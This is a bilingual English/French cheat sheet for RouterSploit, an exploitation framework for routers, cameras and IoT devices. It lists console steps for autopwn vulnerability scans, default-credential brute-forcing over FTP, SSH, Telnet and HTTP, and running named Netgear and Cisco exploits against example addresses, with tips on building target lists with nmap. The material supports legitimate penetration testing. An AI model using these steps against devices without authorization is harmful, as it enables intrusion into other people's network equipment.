RouterSploit
Framework d'exploitation pour périphériques embarqués et routeurs. Inclut des scanners pour plus de 200 CVE et des exploits ciblant des équipements réseau de Cisco, Netgear, Linksys, D-Link et autres. Exploitation framework for embedded devices and routers. Includes scanners for 200+ CVEs and exploits targeting network equipment from Cisco, Netgear, Linksys, D-Link, and others.
↗ https://github.com/threat9/routersploitOverview
RouterSploit is a Metasploit-like framework specifically for embedded devices — routers, cameras, switches, and IoT devices. It includes credential scanners, vulnerability scanners, and exploits targeting known CVEs in popular consumer and enterprise network equipment.
Launch
# Start RouterSploit
sudo rsf
# or
python3 rsf.py
Module Structure
exploits/ CVE-specific exploits for specific devices
scanners/ Scan for vulnerable devices
creds/ Default credential bruteforcers
payloads/ Shellcode/payloads for exploits
generic/ Generic web-based attacks
Scanner Usage
# Auto-scan a target for all known vulnerabilities
rsf > use scanners/autopwn
rsf (AutoPwn) > set target 10.10.10.1
rsf (AutoPwn) > run
# Scan for specific vendor
rsf > use scanners/routers/router_scan
rsf (RouterScan) > set target 10.10.10.1
rsf (RouterScan) > run
# Check for default credentials
rsf > use creds/routers/multi_creds
rsf (MultiCreds) > set target 10.10.10.1
rsf (MultiCreds) > run
# HTTP default credentials
rsf > use creds/http/http_default_creds
rsf (HTTPDefaultCreds) > set target 10.10.10.1
rsf (HTTPDefaultCreds) > set port 8080
rsf (HTTPDefaultCreds) > run
Using Exploits
List all exploits
rsf > use exploits/
→ Tab-complete to browse
# Example: Netgear RCE
rsf > use exploits/routers/netgear/rce
rsf (Netgear RCE) > show options
rsf (Netgear RCE) > set target 192.168.1.1
rsf (Netgear RCE) > check # Verify vulnerability
rsf (Netgear RCE) > run # Exploit
# Example: Cisco exploit
rsf > use exploits/routers/cisco/cisco_ios_http_unauthorized_access
rsf (Cisco) > set target 10.10.10.1
rsf (Cisco) > run
Common Module Categories
# Router exploits (vendor-specific)
exploits/routers/cisco/
exploits/routers/netgear/
exploits/routers/dlink/
exploits/routers/linksys/
exploits/routers/asus/
exploits/routers/tplink/
exploits/routers/huawei/
# Camera exploits
exploits/cameras/dahua/
exploits/cameras/hikvision/
exploits/cameras/axis/
# NAS devices
exploits/nas/seagate/
exploits/nas/synology/
# Generic
generic/ftp_default_creds
generic/ssh_default_creds
generic/telnet_default_creds
Credential Scanners
# FTP default credentials
rsf > use creds/ftp/ftp_default_creds
rsf > set target 10.10.10.1
rsf > run
# SSH default creds
rsf > use creds/ssh/ssh_default_creds
rsf > set target 10.10.10.1
rsf > run
# Telnet default creds
rsf > use creds/telnet/telnet_default_creds
rsf > set target 10.10.10.1
rsf > run
# HTTP form default creds
rsf > use creds/http/http_form_default_creds
rsf > set target 10.10.10.1
rsf > set port 80
rsf > run
Tips
scanners/autopwnis the fastest way to identify vulnerabilities — run it first- Many router exploits require the web interface to be accessible (port 80/443/8080)
- Default credential attacks are surprisingly effective — many IoT devices ship with unchanged defaults
- Combine with
nmapdiscovery to build a target list before running RouterSploit
Key commands
rsf > show modules List all modules
rsf > use <module> Load module
rsf > show options Show configurable options
rsf > set <option> <value> Set option
rsf > check Check if target is vulnerable (no exploit)
rsf > run Execute the module
rsf > back Return to main menu
rsf > search <term> Search modules by keyword
rsf > exit Quit
Vue d’ensemble
RouterSploit est un framework façon Metasploit spécifiquement dédié aux périphériques embarqués : routeurs, caméras, switches et objets IoT. Il inclut des scanners d’identifiants, des scanners de vulnérabilités et des exploits ciblant des CVE connues dans des équipements réseau grand public et professionnels populaires.
Lancement
# Démarrer RouterSploit
sudo rsf
# ou
python3 rsf.py
Structure des modules
exploits/ Exploits spécifiques à une CVE pour des périphériques donnés
scanners/ Scanner à la recherche de périphériques vulnérables
creds/ Bruteforceurs d'identifiants par défaut
payloads/ Shellcodes/payloads pour les exploits
generic/ Attaques web génériques
Utilisation des scanners
# Auto-scanner une cible pour toutes les vulnérabilités connues
rsf > use scanners/autopwn
rsf (AutoPwn) > set target 10.10.10.1
rsf (AutoPwn) > run
# Scanner pour un fabricant spécifique
rsf > use scanners/routers/router_scan
rsf (RouterScan) > set target 10.10.10.1
rsf (RouterScan) > run
# Vérifier les identifiants par défaut
rsf > use creds/routers/multi_creds
rsf (MultiCreds) > set target 10.10.10.1
rsf (MultiCreds) > run
# Identifiants HTTP par défaut
rsf > use creds/http/http_default_creds
rsf (HTTPDefaultCreds) > set target 10.10.10.1
rsf (HTTPDefaultCreds) > set port 8080
rsf (HTTPDefaultCreds) > run
Utilisation des exploits
Lister tous les exploits
rsf > use exploits/
→ Utiliser la complétion par tabulation pour parcourir
# Exemple : RCE Netgear
rsf > use exploits/routers/netgear/rce
rsf (Netgear RCE) > show options
rsf (Netgear RCE) > set target 192.168.1.1
rsf (Netgear RCE) > check # Vérifier la vulnérabilité
rsf (Netgear RCE) > run # Exploiter
# Exemple : exploit Cisco
rsf > use exploits/routers/cisco/cisco_ios_http_unauthorized_access
rsf (Cisco) > set target 10.10.10.1
rsf (Cisco) > run
Catégories de modules courantes
# Exploits routeurs (spécifiques au fabricant)
exploits/routers/cisco/
exploits/routers/netgear/
exploits/routers/dlink/
exploits/routers/linksys/
exploits/routers/asus/
exploits/routers/tplink/
exploits/routers/huawei/
# Exploits caméras
exploits/cameras/dahua/
exploits/cameras/hikvision/
exploits/cameras/axis/
# Périphériques NAS
exploits/nas/seagate/
exploits/nas/synology/
# Génériques
generic/ftp_default_creds
generic/ssh_default_creds
generic/telnet_default_creds
Scanners d’identifiants
# Identifiants FTP par défaut
rsf > use creds/ftp/ftp_default_creds
rsf > set target 10.10.10.1
rsf > run
# Identifiants SSH par défaut
rsf > use creds/ssh/ssh_default_creds
rsf > set target 10.10.10.1
rsf > run
# Identifiants Telnet par défaut
rsf > use creds/telnet/telnet_default_creds
rsf > set target 10.10.10.1
rsf > run
# Identifiants par défaut de formulaire HTTP
rsf > use creds/http/http_form_default_creds
rsf > set target 10.10.10.1
rsf > set port 80
rsf > run
Conseils
scanners/autopwnest le moyen le plus rapide d’identifier des vulnérabilités : le lancer en premier- De nombreux exploits routeurs nécessitent que l’interface web soit accessible (port 80/443/8080)
- Les attaques par identifiants par défaut sont étonnamment efficaces : de nombreux périphériques IoT sont livrés avec des identifiants jamais changés
- Combiner avec une découverte
nmappour construire une liste de cibles avant de lancer RouterSploit
Commandes clés
rsf > show modules List all modules
rsf > use <module> Load module
rsf > show options Show configurable options
rsf > set <option> <value> Set option
rsf > check Check if target is vulnerable (no exploit)
rsf > run Execute the module
rsf > back Return to main menu
rsf > search <term> Search modules by keyword
rsf > exit Quit